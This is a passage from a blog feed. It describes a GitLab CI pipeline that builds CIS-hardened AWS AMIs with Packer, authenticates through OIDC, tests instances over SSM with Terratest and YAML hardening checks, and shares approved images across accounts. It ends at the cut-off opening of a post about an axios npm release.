  <span class="pi">-</span> <span class="na">local</span><span class="pi">:</span> <span class="s">.gitlab/ci/detect/*.gitlab-ci.yml</span>
  <span class="pi">-</span> <span class="na">local</span><span class="pi">:</span> <span class="s">.gitlab/ci/dispatch/*.gitlab-ci.yml</span>
  <span class="pi">-</span> <span class="na">template</span><span class="pi">:</span> <span class="s">Security/Secret-Detection.gitlab-ci.yml</span>
</code></pre></div></div>

<p>The change detector compares the base and head SHAs, walks changed files under <code class="language-plaintext highlighter-rouge">packer/images/**</code>, finds the nearest directory containing <code class="language-plaintext highlighter-rouge">versions.pkr.hcl</code>, and emits a child pipeline job for each changed image. The generated job forwards variables like <code class="language-plaintext highlighter-rouge">PKR_ENV</code>, <code class="language-plaintext highlighter-rouge">PKR_IMAGE</code>, and <code class="language-plaintext highlighter-rouge">PKR_CHECKS_FILE</code>, so one provider pipeline can handle many image directories without copy and paste.</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code>find_packer_root<span class="o">()</span> <span class="o">{</span>
  <span class="nv">path</span><span class="o">=</span><span class="s2">"</span><span class="nv">$1</span><span class="s2">"</span>
  <span class="nb">dir</span><span class="o">=</span><span class="s2">"</span><span class="k">${</span><span class="nv">path</span><span class="p">%/*</span><span class="k">}</span><span class="s2">"</span>

  <span class="k">while</span> <span class="o">[</span> <span class="s2">"</span><span class="nv">$dir</span><span class="s2">"</span> <span class="o">!=</span> <span class="s2">"."</span> <span class="o">]</span> <span class="o">&amp;&amp;</span> <span class="o">[</span> <span class="s2">"</span><span class="nv">$dir</span><span class="s2">"</span> <span class="o">!=</span> <span class="s2">"packer/images"</span> <span class="o">]</span><span class="p">;</span> <span class="k">do
    if</span> <span class="o">[</span> <span class="nt">-f</span> <span class="s2">"</span><span class="nv">$dir</span><span class="s2">/versions.pkr.hcl"</span> <span class="o">]</span><span class="p">;</span> <span class="k">then
      </span><span class="nb">printf</span> <span class="s1">'%s\n'</span> <span class="s2">"</span><span class="nv">$dir</span><span class="s2">"</span>
      <span class="k">return </span>0
    <span class="k">fi
    </span><span class="nb">dir</span><span class="o">=</span><span class="s2">"</span><span class="k">${</span><span class="nv">dir</span><span class="p">%/*</span><span class="k">}</span><span class="s2">"</span>
  <span class="k">done

  return </span>1
<span class="o">}</span>

checks_file<span class="o">()</span> <span class="o">{</span>
  <span class="k">case</span> <span class="s2">"</span><span class="nv">$1</span><span class="s2">"</span> <span class="k">in
    </span>al2023<span class="p">)</span>
      <span class="nb">printf</span> <span class="s1">'checks/al2023-cis-level1.yaml'</span>
      <span class="p">;;</span>
    ubuntu24.04<span class="p">)</span>
      <span class="nb">printf</span> <span class="s1">'checks/ubuntu24.04-cis-level1.yaml'</span>
      <span class="p">;;</span>
    <span class="k">*</span><span class="p">)</span>
      <span class="nb">printf</span> <span class="s1">'checks/al2023-cis-level1.yaml'</span>
      <span class="p">;;</span>
  <span class="k">esac</span>
<span class="o">}</span>
</code></pre></div></div>
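
<p>Here is a minimal sketch of how a detector loop could tie those helpers together, assuming the changed paths arrive one per line on stdin. <code class="language-plaintext highlighter-rouge">image_roots</code> is a hypothetical name used only for illustration, and this copy of <code class="language-plaintext highlighter-rouge">find_packer_root</code> adds a guard that stops once there is no parent directory left to strip.</p>

```shell
# Sketch only: image_roots is a hypothetical helper, not part of the original detector.

# Same upward walk as find_packer_root, plus a guard for paths with no parent left.
find_packer_root() {
  dir="${1%/*}"
  while [ "$dir" != "." ] && [ "$dir" != "packer/images" ]; do
    if [ -f "$dir/versions.pkr.hcl" ]; then
      printf '%s\n' "$dir"
      return 0
    fi
    parent="${dir%/*}"
    [ "$parent" = "$dir" ] && return 1   # nothing left to strip, give up
    dir="$parent"
  done
  return 1
}

# Read changed paths on stdin and print each affected image root exactly once.
image_roots() {
  while IFS= read -r path; do
    case "$path" in
      # Paths with no image root above them are ignored rather than treated as errors.
      packer/images/*) find_packer_root "$path" || : ;;
    esac
  done | sort -u
}
```

<p>Feeding it the output of <code class="language-plaintext highlighter-rouge">git diff --name-only "$BASE_SHA" "$HEAD_SHA"</code> (both variable names are placeholders) would print each affected image directory once, which is the list a generator could turn into child jobs.</p>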

<p>The AWS child pipeline is where the real lifecycle happens. It builds the AMI, extracts the Packer manifest, launches a test instance, runs hardening checks over SSM, and publishes only after those checks pass.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">stages</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="s">build</span>
  <span class="pi">-</span> <span class="s">test</span>
  <span class="pi">-</span> <span class="s">publish</span>

<span class="na">packer:build</span><span class="pi">:</span>
  <span class="na">extends</span><span class="pi">:</span> <span class="s">.packer</span>
  <span class="na">stage</span><span class="pi">:</span> <span class="s">build</span>
  <span class="na">script</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="s">./scripts/build.sh</span>
    <span class="pi">-</span> <span class="pi">|</span>
      <span class="s">manifest="$(find artifacts -type f -name '*-manifest.json' | sort | tail -n 1)"</span>
      <span class="s">artifact_ids="$(jq -r '[.builds[] | select(.artifact_id != null and .artifact_id != "") | .artifact_id] | last // ""' "$manifest")"</span>
      <span class="s">primary_artifact="${artifact_ids%%,*}"</span>
      <span class="s">ami_region="${primary_artifact%%:*}"</span>
      <span class="s">ami_id="${primary_artifact#*:}"</span>
      <span class="s">ami_name="$(aws ec2 describe-images --region "$ami_region" --image-ids "$ami_id" --query 'Images[0].Name' --output text)"</span>

      <span class="s">{</span>
        <span class="s">printf 'AMI_ARTIFACT_IDS=%s\n' "$artifact_ids"</span>
        <span class="s">printf 'AMI_REGION=%s\n' "$ami_region"</span>
        <span class="s">printf 'AMI_ID=%s\n' "$ami_id"</span>
        <span class="s">printf 'AMI_NAME=%s\n' "$ami_name"</span>
      <span class="s">} &gt; artifacts/packer.env</span>
  <span class="na">artifacts</span><span class="pi">:</span>
    <span class="na">reports</span><span class="pi">:</span>
      <span class="na">dotenv</span><span class="pi">:</span> <span class="s">artifacts/packer.env</span>
    <span class="na">paths</span><span class="pi">:</span>
      <span class="pi">-</span> <span class="s">artifacts/</span>

<span class="na">terratest:ami</span><span class="pi">:</span>
  <span class="na">extends</span><span class="pi">:</span> <span class="s">.terratest</span>
  <span class="na">stage</span><span class="pi">:</span> <span class="s">test</span>
  <span class="na">needs</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">job</span><span class="pi">:</span> <span class="s">packer:build</span>
      <span class="na">artifacts</span><span class="pi">:</span> <span class="kc">true</span>
  <span class="na">script</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="s">cd tests/terratest</span>
    <span class="pi">-</span> <span class="s">go test -v -timeout 45m . -args -ami_name "$AMI_NAME" -checks_file "${PKR_CHECKS_FILE:-checks/al2023-cis-level1.yaml}"</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">artifacts/packer.env</code> file is the handoff between build and test. GitLab loads it as a dotenv report, so the test stage doesn’t have to parse the Packer manifest again. It gets the AMI name from the previous job and uses that as the input for the Terratest fixture.</p>
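
<p>The parameter expansions in the build job imply that <code class="language-plaintext highlighter-rouge">artifact_id</code> is a comma-separated list of <code class="language-plaintext highlighter-rouge">region:ami-id</code> pairs. A minimal sketch of that parsing, using made-up AMI IDs and a hypothetical helper named <code class="language-plaintext highlighter-rouge">split_artifact</code>:</p>

```shell
# Sketch only: split_artifact and the sample IDs below are made up for illustration.
# Prints "region ami_id" for every region:ami-id pair in a comma-separated list.
split_artifact() {
  old_ifs="$IFS"
  IFS=','
  for pair in $1; do
    printf '%s %s\n' "${pair%%:*}" "${pair#*:}"
  done
  IFS="$old_ifs"
}

artifact_ids="us-east-2:ami-0aaa1111bbbb2222c,us-west-2:ami-0ddd3333eeee4444f"

# The first pair is what the build job treats as the primary artifact.
primary="${artifact_ids%%,*}"
printf 'primary region=%s id=%s\n' "${primary%%:*}" "${primary#*:}"

# Every pair, one per line, which is the shape a multi-region publish step needs.
split_artifact "$artifact_ids"
```

<p>Only the first pair feeds <code class="language-plaintext highlighter-rouge">AMI_REGION</code>, <code class="language-plaintext highlighter-rouge">AMI_ID</code>, and <code class="language-plaintext highlighter-rouge">AMI_NAME</code>, while the full list travels along in <code class="language-plaintext highlighter-rouge">AMI_ARTIFACT_IDS</code>.</p>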

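<p>The other part I care about is authentication. The build and test jobs use GitLab OIDC to assume an AWS role. That means no long-lived AWS access keys in CI, no local credentials pasted into variables, and no mystery user showing up in CloudTrail. The job writes the GitLab OIDC token to the file named by <code class="language-plaintext highlighter-rouge">AWS_WEB_IDENTITY_TOKEN_FILE</code>, exports <code class="language-plaintext highlighter-rouge">AWS_ROLE_ARN</code>, and lets the AWS SDK credential chain exchange the token for temporary credentials through <code class="language-plaintext highlighter-rouge">AssumeRoleWithWebIdentity</code>.</p>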

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">.packer</span><span class="pi">:</span>
  <span class="na">image</span><span class="pi">:</span>
    <span class="na">name</span><span class="pi">:</span> <span class="s2">"</span><span class="s">$PACKER_BUILD_IMAGE"</span>
    <span class="na">entrypoint</span><span class="pi">:</span> <span class="pi">[</span><span class="s2">"</span><span class="s">"</span><span class="pi">]</span>
  <span class="na">id_tokens</span><span class="pi">:</span>
    <span class="na">AWS_OIDC_TOKEN</span><span class="pi">:</span>
      <span class="na">aud</span><span class="pi">:</span> <span class="s2">"</span><span class="s">https://gitlab.com"</span>
  <span class="na">variables</span><span class="pi">:</span>
    <span class="na">AWS_WEB_IDENTITY_TOKEN_FILE</span><span class="pi">:</span> <span class="s2">"</span><span class="s">$CI_PROJECT_DIR/.aws/gitlab-oidc-token"</span>
  <span class="na">before_script</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="pi">|</span>
      <span class="s">: "${AWS_OIDC_TOKEN:?Missing GitLab AWS OIDC token.}"</span>
      <span class="s">: "${AWS_PACKER_BUILD_OIDC_ROLE_ARN:?Missing AWS Packer build OIDC role ARN.}"</span>

      <span class="s">mkdir -p "$CI_PROJECT_DIR/.aws"</span>
      <span class="s">printf '%s' "$AWS_OIDC_TOKEN" &gt; "$AWS_WEB_IDENTITY_TOKEN_FILE"</span>
      <span class="s">export AWS_ROLE_ARN="$AWS_PACKER_BUILD_OIDC_ROLE_ARN"</span>
      <span class="s">export AWS_ROLE_SESSION_NAME="gitlab-$CI_PROJECT_ID-$CI_PIPELINE_ID-$CI_JOB_ID"</span>
</code></pre></div></div>
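
<p>When the role assumption fails, the usual suspects are the <code class="language-plaintext highlighter-rouge">aud</code> and <code class="language-plaintext highlighter-rouge">sub</code> claims not matching the role's trust policy. A minimal debugging sketch, assuming the token file holds a standard three-segment JWT. <code class="language-plaintext highlighter-rouge">jwt_claims</code> is a hypothetical helper, not part of the pipeline above.</p>

```shell
# Sketch only: jwt_claims is a hypothetical debugging helper, not part of the pipeline.
# Prints the decoded claims (the middle segment) of a JWT stored in a token file.
jwt_claims() {
  # base64url uses '_' and '-' where standard base64 uses '/' and '+'.
  segment="$(cut -d. -f2 "$1" | tr '_-' '/+')"

  # base64url drops padding; restore it so base64 -d accepts the input.
  case $(( ${#segment} % 4 )) in
    2) segment="$segment==" ;;
    3) segment="$segment=" ;;
  esac

  printf '%s\n' "$segment" | base64 -d
}
```

<p>Running <code class="language-plaintext highlighter-rouge">jwt_claims "$AWS_WEB_IDENTITY_TOKEN_FILE"</code> in a throwaway job prints the claims as JSON, which can be compared against the conditions in the trust policy. It decodes only the claims segment and never verifies the signature, so treat it as a troubleshooting aid rather than validation.</p>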

<h2 id="testing-and-scanning-amis">Testing and Scanning AMIs</h2>

<p>Building an AMI is not enough. The pipeline needs to boot the image and prove that the expected hardening controls are present on a running instance.</p>

<p>The test fixture launches one EC2 instance from the AMI name produced by Packer. It discovers the build VPC and subnets by tag, attaches a temporary SSM-capable instance profile when one is not provided, and avoids SSH entirely.</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">data</span> <span class="s2">"aws_ami"</span> <span class="s2">"test"</span> <span class="p">{</span>
  <span class="nx">count</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">tests_enabled</span> <span class="o">?</span> <span class="mi">1</span> <span class="o">:</span> <span class="mi">0</span>

  <span class="nx">most_recent</span> <span class="o">=</span> <span class="kc">true</span>
  <span class="nx">owners</span>      <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">ami_owners</span>

  <span class="nx">filter</span> <span class="p">{</span>
    <span class="nx">name</span>   <span class="o">=</span> <span class="s2">"name"</span>
    <span class="nx">values</span> <span class="o">=</span> <span class="p">[</span><span class="nx">var</span><span class="p">.</span><span class="nx">ami_name</span><span class="p">]</span>
  <span class="p">}</span>

  <span class="nx">filter</span> <span class="p">{</span>
    <span class="nx">name</span>   <span class="o">=</span> <span class="s2">"root-device-type"</span>
    <span class="nx">values</span> <span class="o">=</span> <span class="p">[</span><span class="s2">"ebs"</span><span class="p">]</span>
  <span class="p">}</span>

  <span class="nx">filter</span> <span class="p">{</span>
    <span class="nx">name</span>   <span class="o">=</span> <span class="s2">"virtualization-type"</span>
    <span class="nx">values</span> <span class="o">=</span> <span class="p">[</span><span class="s2">"hvm"</span><span class="p">]</span>
  <span class="p">}</span>
<span class="p">}</span>

<span class="nx">resource</span> <span class="s2">"aws_instance"</span> <span class="s2">"test"</span> <span class="p">{</span>
  <span class="nx">count</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">tests_enabled</span> <span class="o">?</span> <span class="mi">1</span> <span class="o">:</span> <span class="mi">0</span>

  <span class="nx">ami</span>                         <span class="o">=</span> <span class="nx">one</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">aws_ami</span><span class="p">.</span><span class="nx">test</span><span class="p">[*].</span><span class="nx">id</span><span class="p">)</span>
  <span class="nx">instance_type</span>               <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">instance_type</span>
  <span class="nx">subnet_id</span>                   <span class="o">=</span> <span class="nx">sort</span><span class="p">(</span><span class="nx">one</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">aws_subnets</span><span class="p">.</span><span class="nx">test</span><span class="p">[*].</span><span class="nx">ids</span><span class="p">))[</span><span class="mi">0</span><span class="p">]</span>
  <span class="nx">vpc_security_group_ids</span>      <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">security_group_ids</span> <span class="o">!=</span> <span class="kc">null</span> <span class="o">?</span> <span class="nx">var</span><span class="p">.</span><span class="nx">security_group_ids</span> <span class="o">:</span> <span class="p">[</span><span class="nx">one</span><span class="p">(</span><span class="nx">aws_security_group</span><span class="p">.</span><span class="nx">test</span><span class="p">[*].</span><span class="nx">id</span><span class="p">)]</span>
  <span class="nx">iam_instance_profile</span>        <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">iam_instance_profile</span> <span class="o">!=</span> <span class="kc">null</span> <span class="o">?</span> <span class="nx">var</span><span class="p">.</span><span class="nx">iam_instance_profile</span> <span class="o">:</span> <span class="nx">one</span><span class="p">(</span><span class="nx">aws_iam_instance_profile</span><span class="p">.</span><span class="nx">test</span><span class="p">[*].</span><span class="nx">name</span><span class="p">)</span>
  <span class="nx">associate_public_ip_address</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">associate_public_ip_address</span>

  <span class="nx">tags</span> <span class="o">=</span> <span class="nx">merge</span><span class="p">(</span>
    <span class="nx">var</span><span class="p">.</span><span class="nx">tags</span><span class="p">,</span>
    <span class="p">{</span>
      <span class="nx">Name</span> <span class="o">=</span> <span class="nx">format</span><span class="p">(</span><span class="s2">"%s-test"</span><span class="p">,</span> <span class="nx">var</span><span class="p">.</span><span class="nx">ami_name</span><span class="p">)</span>
    <span class="p">},</span>
  <span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The Go test loads a YAML file of hardening checks, waits for SSM to report that the instance is connected, and then runs each command through <code class="language-plaintext highlighter-rouge">AWS-RunShellScript</code>. A check passes when the command exits successfully and, if the check sets <code class="language-plaintext highlighter-rouge">expect_stdout_contains</code>, stdout contains that value.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">type</span> <span class="n">hardeningCheck</span> <span class="k">struct</span> <span class="p">{</span>
	<span class="n">ID</span>                   <span class="kt">string</span> <span class="s">`yaml:"id"`</span>
	<span class="n">Description</span>          <span class="kt">string</span> <span class="s">`yaml:"description"`</span>
	<span class="n">Command</span>              <span class="kt">string</span> <span class="s">`yaml:"command"`</span>
	<span class="n">ExpectStdoutContains</span> <span class="kt">string</span> <span class="s">`yaml:"expect_stdout_contains,omitempty"`</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">TestAMIHardeningChecks</span><span class="p">(</span><span class="n">t</span> <span class="o">*</span><span class="n">testing</span><span class="o">.</span><span class="n">T</span><span class="p">)</span> <span class="p">{</span>
	<span class="n">t</span><span class="o">.</span><span class="n">Parallel</span><span class="p">()</span>
	<span class="n">logger</span><span class="o">.</span><span class="n">Default</span> <span class="o">=</span> <span class="n">logger</span><span class="o">.</span><span class="n">Discard</span>

	<span class="k">if</span> <span class="o">*</span><span class="n">amiName</span> <span class="o">==</span> <span class="s">""</span> <span class="p">{</span>
		<span class="n">t</span><span class="o">.</span><span class="n">Skip</span><span class="p">(</span><span class="s">"ami_name flag must be set"</span><span class="p">)</span>
	<span class="p">}</span>

	<span class="k">const</span> <span class="n">tfDir</span> <span class="o">=</span> <span class="s">"../terraform"</span>

	<span class="k">defer</span> <span class="n">ts</span><span class="o">.</span><span class="n">RunTestStage</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="s">"destroy"</span><span class="p">,</span> <span class="k">func</span><span class="p">()</span> <span class="p">{</span>
		<span class="n">destroyTerraform</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">tfDir</span><span class="p">)</span>
	<span class="p">})</span>

	<span class="n">ts</span><span class="o">.</span><span class="n">RunTestStage</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="s">"deploy"</span><span class="p">,</span> <span class="k">func</span><span class="p">()</span> <span class="p">{</span>
		<span class="n">applyTerraform</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">tfDir</span><span class="p">)</span>
	<span class="p">})</span>

	<span class="n">ssmClient</span> <span class="o">:=</span> <span class="n">aws</span><span class="o">.</span><span class="n">NewSsmClient</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">awsRegion</span><span class="p">)</span>

	<span class="n">ts</span><span class="o">.</span><span class="n">RunTestStage</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="s">"validate"</span><span class="p">,</span> <span class="k">func</span><span class="p">()</span> <span class="p">{</span>
		<span class="n">validate</span><span class="p">(</span><span class="n">t</span><span class="p">,</span> <span class="n">tfDir</span><span class="p">,</span> <span class="n">ssmClient</span><span class="p">)</span>
	<span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The checks use plain YAML so security engineers can review them without having to read Go. Adding another assertion means updating the relevant checks file and letting the same test harness run it.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">checks</span><span class="pi">:</span>
  <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">1.1.1.1-cramfs-disabled</span>
    <span class="na">description</span><span class="pi">:</span> <span class="s">cramfs filesystem module is disabled</span>
    <span class="na">command</span><span class="pi">:</span> <span class="s2">"</span><span class="s">!</span><span class="nv"> </span><span class="s">lsmod</span><span class="nv"> </span><span class="s">|</span><span class="nv"> </span><span class="s">grep</span><span class="nv"> </span><span class="s">-q</span><span class="nv"> </span><span class="s">cramfs</span><span class="nv"> </span><span class="s">&amp;&amp;</span><span class="nv"> </span><span class="s">modprobe</span><span class="nv"> </span><span class="s">-n</span><span class="nv"> </span><span class="s">-v</span><span class="nv"> </span><span class="s">cramfs</span><span class="nv"> </span><span class="s">2&gt;&amp;1</span><span class="nv"> </span><span class="s">|</span><span class="nv"> </span><span class="s">grep</span><span class="nv"> </span><span class="s">-qE</span><span class="nv"> </span><span class="s">'install</span><span class="nv"> </span><span class="s">/bin/(true|false)'"</span>

  <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">1.5.1-aslr-enabled</span>
    <span class="na">description</span><span class="pi">:</span> <span class="s">kernel.randomize_va_space is set to 2 (full ASLR)</span>
    <span class="na">command</span><span class="pi">:</span> <span class="s2">"</span><span class="s">sysctl</span><span class="nv"> </span><span class="s">-n</span><span class="nv"> </span><span class="s">kernel.randomize_va_space"</span>
    <span class="na">expect_stdout_contains</span><span class="pi">:</span> <span class="s2">"</span><span class="s">2"</span>

  <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">5.2.6-ssh-root-login-disabled</span>
    <span class="na">description</span><span class="pi">:</span> <span class="s">SSH PermitRootLogin is set to no</span>
    <span class="na">command</span><span class="pi">:</span> <span class="s2">"</span><span class="s">sshd</span><span class="nv"> </span><span class="s">-T</span><span class="nv"> </span><span class="s">2&gt;/dev/null</span><span class="nv"> </span><span class="s">|</span><span class="nv"> </span><span class="s">grep</span><span class="nv"> </span><span class="s">-i</span><span class="nv"> </span><span class="s">'^permitrootlogin'</span><span class="nv"> </span><span class="s">|</span><span class="nv"> </span><span class="s">awk</span><span class="nv"> </span><span class="s">'{print</span><span class="nv"> </span><span class="s">$2}'"</span>
    <span class="na">expect_stdout_contains</span><span class="pi">:</span> <span class="s2">"</span><span class="s">no"</span>
</code></pre></div></div>
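
<p>Before adding a check to the YAML file, it helps to dry-run the command on a scratch instance. The sketch below mirrors the pass rule as described (zero exit status, plus an optional substring match on stdout). <code class="language-plaintext highlighter-rouge">run_check</code> is a hypothetical local helper, not the Go harness, and it runs the command locally instead of over SSM.</p>

```shell
# Sketch only: run_check is a hypothetical helper that mirrors the pass rule described above.
# usage: run_check ID COMMAND [EXPECTED_SUBSTRING]
run_check() {
  id="$1"
  cmd="$2"
  expected="${3:-}"

  # Capture stdout; a non-zero exit fails the check outright.
  if ! stdout="$(sh -c "$cmd")"; then
    printf 'FAIL %s (non-zero exit)\n' "$id"
    return 1
  fi

  # When an expected value is given, stdout must contain it.
  if [ -n "$expected" ]; then
    case "$stdout" in
      *"$expected"*) ;;
      *)
        printf 'FAIL %s (stdout missing "%s")\n' "$id" "$expected"
        return 1
        ;;
    esac
  fi

  printf 'PASS %s\n' "$id"
}
```

<p>For example, <code class="language-plaintext highlighter-rouge">run_check 1.5.1-aslr-enabled "sysctl -n kernel.randomize_va_space" "2"</code> exercises the second check from the file. Because the match is a substring test, an expected value of <code class="language-plaintext highlighter-rouge">2</code> would also accept output such as <code class="language-plaintext highlighter-rouge">12</code>, so commands should print as little as possible.</p>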

<p>The custom check format isn’t mandatory. If a team doesn’t want to maintain a separate validation harness, the same checks can move into Ansible validation playbooks. Ansible can use SSM to run checks on the temporary instance without opening SSH, which keeps the network model mostly the same while moving the assertions into a tool more operators already know. That is probably where this project goes over time.</p>

<p>This isn’t a full substitute for every scanner or every benchmark. The wider program should still include vulnerability scanning, package inventory, and Amazon Inspector coverage. These tests catch direct build regressions immediately: the service didn’t start, the kernel setting didn’t stick, the SSH drop-in didn’t get read, or the baseline package never landed.</p>

<h2 id="tagging-and-sharing-images">Tagging and Sharing Images</h2>

<p>Publishing is gated to the default branch. Merge requests can build and test, but they don’t share AMIs to the organization. Once a default-branch build passes, the publish job tags the image as published and grants launch permissions to each account in <code class="language-plaintext highlighter-rouge">account-map.yaml</code>.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="na">publish:ami</span><span class="pi">:</span>
  <span class="na">extends</span><span class="pi">:</span> <span class="s">.terratest</span>
  <span class="na">stage</span><span class="pi">:</span> <span class="s">publish</span>
  <span class="na">needs</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">job</span><span class="pi">:</span> <span class="s">packer:build</span>
      <span class="na">artifacts</span><span class="pi">:</span> <span class="kc">true</span>
    <span class="pi">-</span> <span class="na">job</span><span class="pi">:</span> <span class="s">terratest:ami</span>
  <span class="na">script</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="pi">|</span>
      <span class="s">published_at="$(date -u +%Y-%m-%dT%H:%M:%SZ)"</span>
      <span class="s">account_ids="$(sed -n "s/.*: '\([0-9]\{12\}\)'$/\1/p" account-map.yaml)"</span>

      <span class="s">if [ -z "$account_ids" ]; then</span>
        <span class="s">printf 'No AWS account IDs found in account-map.yaml.\n' &gt;&amp;2</span>
        <span class="s">exit 1</span>
      <span class="s">fi</span>

      <span class="s">for artifact in $(printf '%s' "$AMI_ARTIFACT_IDS" | tr ',' ' '); do</span>
        <span class="s">ami_region="${artifact%%:*}"</span>
        <span class="s">ami_id="${artifact#*:}"</span>

        <span class="s">aws ec2 create-tags \</span>
          <span class="s">--region "$ami_region" \</span>
          <span class="s">--resources "$ami_id" \</span>
          <span class="s">--tags \</span>
            <span class="s">Key=ImageFactoryPublished,Value=true \</span>
            <span class="s">Key=ImageFactoryPublishedAt,Value="$published_at"</span>

        <span class="s">for account_id in $account_ids; do</span>
          <span class="s">aws ec2 modify-image-attribute \</span>
            <span class="s">--region "$ami_region" \</span>
            <span class="s">--image-id "$ami_id" \</span>
            <span class="s">--launch-permission "Add=[{UserId=$account_id}]"</span>
        <span class="s">done</span>
      <span class="s">done</span>
  <span class="na">rules</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">if</span><span class="pi">:</span> <span class="s1">'</span><span class="s">$CI_COMMIT_REF_NAME</span><span class="nv"> </span><span class="s">==</span><span class="nv"> </span><span class="s">$CI_DEFAULT_BRANCH'</span>
</code></pre></div></div>

<p>The operational details matter here. The job reads artifact IDs from the Packer manifest instead of assuming one region. It tags the AMI after tests pass, not before. It fails closed if the account map is empty. Those small choices make the release process repeatable without someone babysitting every run.</p>
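
<p>The account extraction is easy to try outside CI. This is a minimal sketch, assuming <code class="language-plaintext highlighter-rouge">account-map.yaml</code> maps names to single-quoted 12-digit IDs. That layout is inferred from the <code class="language-plaintext highlighter-rouge">sed</code> pattern in the publish job, and the sample entries and the <code class="language-plaintext highlighter-rouge">extract_account_ids</code> name are made up.</p>

```shell
# Sketch only: the file layout is an assumption inferred from the sed pattern
# in the publish job (a name, a colon, then a single-quoted 12-digit ID).
account_map="$(mktemp)"
cat > "$account_map" <<'EOF'
accounts:
  security: '111111111111'
  platform: '222222222222'
  sandbox: "333333333333"
  notes: 'not-an-account'
EOF

# Same expression the publish job uses, wrapped in a function for reuse.
extract_account_ids() {
  sed -n "s/.*: '\([0-9]\{12\}\)'$/\1/p" "$1"
}

account_ids="$(extract_account_ids "$account_map")"

# Fail closed: an empty result stops the run instead of publishing to nobody.
if [ -z "$account_ids" ]; then
  printf 'No AWS account IDs found in %s.\n' "$account_map" >&2
  exit 1
fi

printf '%s\n' "$account_ids"
rm -f "$account_map"
```

<p>With this sample file, only the two single-quoted IDs come back. The double-quoted <code class="language-plaintext highlighter-rouge">sandbox</code> entry is skipped without any warning, so the quoting style in the account map has to stay consistent for the pattern to see every account.</p>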

<h2 id="tradeoffs-and-unknowns">Tradeoffs and Unknowns</h2>

<p>The main tradeoff is time. Building an AMI, booting it, waiting for SSM, running checks, and cleaning everything up is slower than normal application CI. The change-detection pipeline keeps the cost down by rebuilding only affected images. The boot test is still worth it when the alternative is distributing a broken base image to dozens of accounts.</p>

<p>Benchmark drift needs active ownership. CIS guidance, Marketplace images, distro defaults, and security agents all change. The validation checks should live beside the image definition so every hardening change can be reviewed with the matching test change.</p>

<p>Marketplace image handling has its own operational messiness. Product codes, owner IDs, naming patterns, and regional availability are all things you have to test in a real AWS account. Parameterizing the inputs helps, but it doesn’t remove the fact that AWS Marketplace images aren’t always as smooth as a vanilla owner-and-name AMI lookup.</p>

<p>Finally, AMI sharing is only part of distribution. Consumers still need a sane way to discover the latest approved AMI, whether that is through tags, SSM parameters, Service Catalog, Terraform data sources, or an internal platform workflow. Sharing the image makes it available. It doesn’t automatically make every team use it correctly.</p>

<h2 id="wrapping-up">Wrapping Up</h2>

<p>An image factory isn’t a compliance shortcut. It is a controlled path for choosing a trusted base, applying organization-specific deltas, testing the running result, and sharing the AMI only after the pipeline proves it is ready.</p>

<p>That’s the real goal: turn “please use the hardened image” from a slide deck request into something teams can actually use.</p>

<hr />

<p>If you liked (or hated) this blog, feel free to check out my <a href="https://github.com/R0seSecurity">GitHub</a>!</p>]]></content><author><name></name></author><category term="automation" /><category term="aws" /><category term="packer" /><category term="infra" /><summary type="html"><![CDATA[Sorry I’ve been quiet lately. My head has been down on my newest adventure. I’m so used to being the sole operator, platform engineer, SRE, or whatever that day brings that it’s odd to take a step back and be tasked with providing enterprise cybersecurity for cloud environments that other teams are operating. I’ve had so many cool new projects that will make for some great technical blogs, so I figured I would start with this one. The idea is simple: how do you provide your organization with hardened operating systems that teams can actually deploy into the cloud? A lot of compliance terms and frameworks get tossed around, but the vision is this: how do you provide an image factory of CIS-hardened AMIs, bake in a custom baseline of tools, and share those images across numerous AWS accounts and organizations?]]></summary></entry><entry><title type="html">Welcome to Transitive Dependency Hell</title><link href="https://rosesecurity.cloud/2026/03/31/welcome-to-transitive-dependency-hell.html" rel="alternate" type="text/html" title="Welcome to Transitive Dependency Hell" /><published>2026-03-31T00:00:00+00:00</published><updated>2026-03-31T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2026/03/31/welcome-to-transitive-dependency-hell</id><content type="html" xml:base="https://rosesecurity.cloud/2026/03/31/welcome-to-transitive-dependency-hell.html"><![CDATA[<p>At 00:21 UTC on March 31, someone published <code class="language-plaintext highlighter-rouge">axios@1.14.1</code> to npm. Three 